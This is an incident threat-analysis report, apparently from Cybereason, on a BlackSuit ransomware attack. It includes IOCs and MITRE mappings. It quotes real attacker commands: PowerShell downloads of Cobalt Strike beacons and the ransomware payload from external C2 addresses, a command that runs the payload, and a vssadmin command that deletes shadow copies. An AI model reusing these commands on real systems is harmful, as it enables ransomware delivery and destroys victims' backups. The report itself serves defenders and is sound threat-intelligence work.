Cybereason Security Services issue Threat Analysis reports to inform on impacting threats. The Threat Analysis reports investigate these threats and provide practical recommendations for protecting against them.
In this Threat Analysis report, Cybereason Security Services investigates a BlackSuit ransomware attack we recently observed that represents a significant threat to organizations, leveraging tools like Cobalt Strike for command and control (C2), rclone for data exfiltration, and BlackSuit ransomware for file encryption.
KEY points
- In a recent ransomware attack observed by our security services team, we noticed unique TTPs related to the BlackSuit ransomware group
- BlackSuit is a ransomware group that emerged in mid-2023, and is widely believed to be a rebrand or spin-off of the Royal ransomware gang, which itself evolved from Conti, a notorious Russian-speaking ransomware group.
- The BlackSuit ransomware group used Cobalt Strike as its primary attack tool, combined with other tools like rclone, and/or windows processes like RDP, psexec, vssadmin during the attack.
- Unlike traditional ransomware attacks, BlackSuit ransomware group is observed to exfiltrate and delete parts of the targeted data, then proceed with file encryption. This helps decrease the encryption target and results in a speedier attack flow.
- Sophisticated and multi-stage operation aimed at compromising the target's systems, exfiltrating sensitive data, and encrypting critical files.
- Unusual use of -nomutex flag in BlackSuit ransomware execution to allow multiple instances.
introduction
Our team recently observed a ransomware attack performed by the BlackSuit ransomware group that highlighted new methods employed by the threat actor and the impact on the affected organization.
BlackSuit ransomware is a recent evolution of the Royal ransomware family. It leverages various sophisticated tools for lateral movement, data exfiltration, and encryption.
Returning to the attention of the public in 2024,the BlackSuit ransomware group is an emerging successor to the notorious Royal ransomware. BlackSuit ransomware group has shown sophisticated attack methods that utilize tools including remote command execution (psexec.exe), red-team penetration testing tool (Cobalt Strike), remote access and management (RDP), command-line tool for syncing and transferring files (rclone) and more. The ransom demands have ranged from roughly $1 million to $ 10 million USD, often requesting payment in Bitcoin. Unlike many ransomware groups, the initial ransom amount is not stated in the initial ransom note, but requires direct interaction with the threat actor through a TOR browser for ransom payments and negotiations.
TECHNICAL ANALYSIS
During their attack, the BlackSuit ransomware group leveraged cobalt strike beacons to move laterally and make C2 connections, as well as used BlackSuit ransomware to encrypt data.
Attack Flow Breakdown
The initial access vector for this attack remains unknown, as our observations indicate that the first connections to the affected machines originated from a device without a Cybereason sensor.
Cobalt Strike is observed to be the primary attack tool utilized by BlackSuit ransomware. In our investigation, we have categorized several behaviors related to Cobalt Strike.
Lateral Movement
BlackSuit ransomware is widely reported to utilize RDP, SMB, and PsExec.exe for moving laterally within the environment. We have detected and investigated instances particularly utilizing PsExec.exe and remote procedure call (RPC), which can be seen in the screenshot below.
Utilizing PsExec.exe
Cybereason observed use of PsExec.exe to execute remote commands that attempt to copy Cobalt Strike Beacon vm.dll and vm80.dll onto the (C:\Windows\Temp) folder of other machines in the environment. Furthermore, trying to execute and call the function ExportFunc64 from the beacons.
Utilizing Remote Procedure call (RPC) and Other Windows Functions
Cybereason observed execution of (Configure-SMRemoting.exe) on one of the affected devices, which allows for remote control. Remote services were created using RPC (MS-SCMR RCreateService) using System privileges. In addition, we noted multiple binaries with atypical naming conventions were executed from network share, some of them resulted in (rundll32) injecting code into (wuaclt.exe) and scanning the whole internal network.
- \\10.1.xxx.xxx\ADMIN$\frdke23.exe
There were 5 other executables that were observed with similar atypical naming conventions and executed in the same way.
Lateral Movement activity detected in Cybereason EDR
Command and Control (C2)
Cobalt Strike Beacon Downloading
Cybereason has observed usage of powershell commands to connect to C2 IP address (184.174.96[.]71) to download (file.ext) and save them as vm.dll and vm80.dll. They have been identified as Cobalt Strike Beacon through file hash reputation.
Executed PowerShell commands are as follows:
- “PowerShell.exe” invoke-webrequest http://184.174.96[.]71:8002/download/file.ext -OutFile c:\programdata\vm.dll
- “PowerShell.exe” invoke-webrequest http://184.174.96[.]71:8002/download/file.ext -OutFile c:\programdata\vm80.dll
Malicious Payload Download
Originating from PsExec.exe, Powershell commands were executed to connect to a compromised internal IP address, downloading malicious payload and rename it as (b.exe), and renamed it to a different name again later on. We have identified this to be the BlackSuit ransomware payload. Multiple malicious activities like network scanning and file deletion were also observed. We will be discussing its malicious behavior more in the Impact section.
- "C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -command "(new-object net.webclient).downloadfile('http://10.1.xxx.xxx:8088/yyy.exe', 'c:\programdata\b.exe'); c:\programdata\b.exe -id LE2OYvCXLI2PIN66LmldgMRLBbcXWb1U -nomutex"
Unlike typical ransomware behavior, which uses CreateMutex to avoid re-infection or duplication, the -nomutex flag disables mutex creation. This suggests a possible shift in tactic, enabling multiple concurrent executions — potentially for redundancy, faster encryption across sessions, or to bypass mutex-based detections and sandbox limitations.
In addition, another file was observed in the environment and used for ransomware-related behaviors. This is also identified as BlackSuit ransomware payload since it shares the same file hash with b.exe.
Second Malicious Payload vmware.dll Downloaded
Originated from suspicious executables in the network share folder (\\10.1.xxx.xxx\ADMIN$\xxx.exe), rundll32.exe was spawned and connected to a C2 IP address (184[.]174[.]96[.]71). Consequently, PowerShell commands were executed connecting to C2 IP address (180[.]131[.]145[.]85:8098) to download malicious payload (file.ext) and renamed to (vmware.dll). It was then loaded and executed by (rundll32.exe) through the below command line
- “rundll32 vmware.dll,StartW”.
- Powershell commandline used -> invoke-webrequest hxxp[://]180[.]131[.]145[.]85:8098/download/file[.]ext -OutFile vmware.dll
Impact
LSASS Credential Access and Dumping
The Cobalt Strike tool itself is known to leverage tools like Mimikatz or CreBandit for various credential dumping behaviors.
Rundll32.exe is observed connecting to multiple malicious domains/IPs with the naming convention of xxx.misstallion[.]com, while loading Cobalt Strike beacon vm.dll and vm80.dll. Subsequently, it had conducted Anonymous RWX code injection into wuauclt.exe and led to accessing and creating LSASS credentials dump files.
Data Exfiltration
rclone.exe was observed to be renamed into vmware.exe and utilized in this incident. Rclone is a free, open-source command-line tool that allows users to copy, sync, encrypt, and manage files between cloud storage and your local system.
Executed from a network shared folder, a2e6ee5.exe spawned rundll32.exe, cmd.exe, and executed vmware.exe/rclone.exe connecting to multiple C2 domains and IP addresses. This is believed to be the data exfiltration behavior part of the attack. Roughly 60 GB of data was observed in transmission.
Data Exfiltration activity detected in Cybereason EDR
Data Deletion Through vssadmin.exe
PowerShell was observed downloading malicious payload yyy.exe and renaming it to b.exe. b.exe was executed and observed to conduct network scanning, and lead to vssadmin.exe to delete file shadow copies. The exact PowerShell command used is below:
- Vssadmin.exe /c vssadmin delete shadows /all /quiet
File Enumeration and Encryption Logic
After the backups were deleted, BlackSuit ransomware set its exclusion paths (the files or directories spared from file encryption). The following file extensions are excluded from being encrypted:
.BlackSuit
.exe
.dll
README.BlackSuit.txt
Code Snippet Of file enumeration and encryption logic
It then avoids encrypting critical system directories and network shares, likely to reduce the risk of breaking system functionality.
"Windows" (prevents encrypting system files).
"IPC$" (avoids breaking IPC mechanisms).
"ADMIN$" (prevents issues with admin shares).
Code Snippet Of Checking Other Exclusions
Encryption of Data and Leaving Ransom Notes
BlackSuit ransomware is known for its dual approach of data encryption and data deletion, compared to traditional ransomware malware that only focus on data deletion. Such a partial encryption method allows the threat actor to decide a specific percentage of data to encrypt, which helps evade detection and significantly improves ransomware speed.
From the BlackSuit ransomware payload, we were able to detect file events that indicate encryption behavior and ransom notes creation.
This function copies the wide string "README.BlackSuit.txt" (20 characters) into a dynamically allocated or preallocated internal buffer.
It’s prepping this string, likely to write or drop the ransom note.
This function writes or stores the ransom message body (in cleartext), registers a cleanup or exit routine, is likely called after the ransom filename is set (README.BlackSuit.txt from the earlier function), and is part of the setup routine for dropping the ransom note on disk.This function writes or stores the ransom message body (in cleartext), registers a cleanup or exit routine, is likely called after the ransom filename is set (README.BlackSuit.txt from the earlier function), and is part of the setup routine for dropping the ransom note on disk.
Conclusion
This BlackSuit ransomware attack demonstrated a sophisticated and multi-stage operation aimed at compromising the target's systems, exfiltrating sensitive data, and encrypting critical files.
As part of the data exfiltration phase, the attacker leveraged a renamed version of the legitimate rclone utility to covertly transfer sensitive files to a remote location, thereby compromising confidentiality. This step highlighted the attacker’s ability to blend malicious activity with legitimate processes, making detection more challenging.
This attack underscores the importance of robust security measures, including network segmentation and vigilance against the abuse of legitimate tools for malicious purposes. A comprehensive security strategy is essential to prevent and mitigate the impact of such advanced threats.
| IOC | IOC Type | Description |
|
d53f5c10f07d4610a0fa1b6a8638648e4ab5370377364a2cc7aff4bb75c4d71b |
SHA-256 |
Vm80.dll |
|
69a20bae02480e03cb36e26729ed4a74c613eee5ba8c44396655da84a851fd03 |
SHA-256 |
Vm.dll |
|
0112e3b20872760dda5f658f6b546c85f126e803e27f0577b294f335ffa5a298 |
SHA-256 |
rclone.exe disguised as vmware.exe. Used for data exfiltration in the incident. |
|
180[.]131[.]145[.]85 |
IP address |
C2 IP address |
|
82.192.88[.]95 |
IP address |
C2 IP address |
|
88[.]119[.]175[.]194 |
IP address |
C2 IP address |
|
184.174.96[.]71 |
IP address |
C2 IP address |
|
misstallion[.]com |
C2 Domain |
C2 Domain |
|
Store.misstallion[.]com |
C2 Domain |
C2 Domain |
|
mail.misstallion[.]com |
C2 Domain |
C2 Domain |
|
store[.]beamofthemoon[.]com |
C2 Domain |
C2 Domain |
|
Mail[.]beamofthemoon[.]com |
C2 Domain |
C2 Domain |
|
beamofthemoon[.]com |
C2 Domain |
C2 Domain |
|
mail[.]beamofthemoon[.]com |
C2 Domain |
C2 Domain |
|
mail[.]kiddlanka[.]com |
C2 Domain |
C2 Domain |
|
kiddlanka[.]com |
C2 Domain |
C2 Domain |
|
Tactic |
Techniques / Sub-Techniques |
Summary |
|
TA0002-Execution |
T1059- Command and scripting interpreter: PowerShell |
PowerShell downloading Cobalt Strike beacon, and other malicious payload |
|
TA0008-Lateral Movement |
T1021.002: Remote Services: SMB/Windows Admin Shares |
Lateral movement from psexec.exe |
|
TA0008-Lateral Movement |
T1569.002: System Services: Service Execution |
Lateral movement from psexec.exe |
|
TA0008-Lateral Movement |
T1021-Remote Services |
Lateral movement from RPC |
|
T1021 – Remote Desktop Protocol (RDP) |
T1136.001 – Create Account: Local Account |
Adds an existing user (Administrator) to the Remote Desktop Users group, enabling RDP access. |
|
T1082 – System Information Discovery |
T1082 – System Information Discovery |
Gathering details about installed software, specifically security products. |
|
T1562 - Impair Defenses |
T1562.001 - Disable or Modify Tools |
Uninstall a product (probably security software). |
|
TA0011-Command and Control |
T1105 – Ingress Tool Transfer |
PowerShell downloading Cobalt Strike beacon, (vmware.dll)(vm.dll)(vm80.dll)(xxx.exe)(yyy.exe) and other payloads. |
|
TA0006-Credential Access |
T1003.001 LSASS Memory |
Cobalt Strike beacon lead to LSASS credential access and dumping |
|
TA0010-Exfiltration |
T1567.002 – Exfiltration Over Web Service: Exfiltration to Cloud Storage |
Data exfiltration through rclone.exe |
|
TA0005-Defense Evasion |
T1614-System Location Discovery |
Avoids encrypting system directories and network shares like "Windows", "IPC$", and "ADMIN$". |
|
TA0040-Impact |
T1490-Inhibit System Recovery |
Deletes Volume Shadow Copies (vssadmin.exe) to prevent recovery. |
|
A0040-Impact |
T1486-Data Encrypted for impact |
Data encryption by BlackSuit ransomware payload |
Mahadev Joshi
Senior Security Analyst, Cybereason Global SOC
Kengwei Lin
Senior Security Analyst, Cybereason Global SOC